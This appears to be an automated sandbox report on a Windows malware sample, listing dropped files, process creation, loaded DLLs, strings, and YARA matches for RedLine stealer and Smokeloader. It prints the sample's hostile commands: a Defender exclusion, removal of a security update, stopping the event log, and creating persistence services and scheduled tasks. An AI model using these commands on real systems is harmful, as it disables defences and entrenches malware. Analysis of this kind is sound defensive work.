                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_00406DC6
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_0040759D
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Code function: 4_2_00007FF69A533B50
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Code function: 27_2_00007FF7EE4A3B50
                        Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000000140003150
                        Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00000001400026E0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 41_2_0098BEB0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 41_2_0098BEA1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 41_2_07F43EA8
                        Source: Joe Sandbox View | Dropped File: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe 5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Code function: String function: 00007FF7EE4A1394 appears 33 times
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Code function: String function: 00007FF69A531394 appears 33 times
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: BroomSetup.exe.3.dr | Static PE information: Number of sections : 11 > 10
                        Source: 25C1.exe, 00000000.00000000.1354675973.0000000000DD2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename288c47bbc1871b439df19ff4df68f0776.exe4 vs 25C1.exe
                        Source: 25C1.exe, 00000000.00000002.1371770531.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 25C1.exe
                        Source: 25C1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 25C1.exe, type: SAMPLE | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                        Source: 0.0.25C1.exe.520000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                        Source: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000020.00000002.1591528645.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@67/30@3/7
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 2_2_028307C6 CreateToolhelp32Snapshot,Module32First
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_004021AF CoCreateInstance
                        Source: C:\Users\user\Desktop\25C1.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\25C1.exe.log
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6404:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7976:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3656:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:7964:64:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                        Source: C:\Users\user\Desktop\25C1.exe | File created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                        Source: Yara match | File source: 5.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000005.00000000.1369842650.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\explorer.exe
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Command line argument: E~|x3 (2_1_00401454)
                        Source: 25C1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: 25C1.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Users\user\Desktop\25C1.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\25C1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: 25C1.exe | ReversingLabs: Detection: 78%
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                        Source: unknown | Process created: C:\Users\user\Desktop\25C1.exe "C:\Users\user\Desktop\25C1.exe"
                        Source: C:\Users\user\Desktop\25C1.exe | Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Users\user\Desktop\25C1.exe | Process created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                        Source: C:\Users\user\Desktop\25C1.exe | Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UTIXDCVF"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
                        Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UTIXDCVF"
                        Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
                        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\25C1.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: sxs.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: samcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: samlib.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: oleacc.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: wkscli.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: colorui.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: mscms.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: coloradapterclient.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: compstui.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: inetres.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: coremessaging.dll
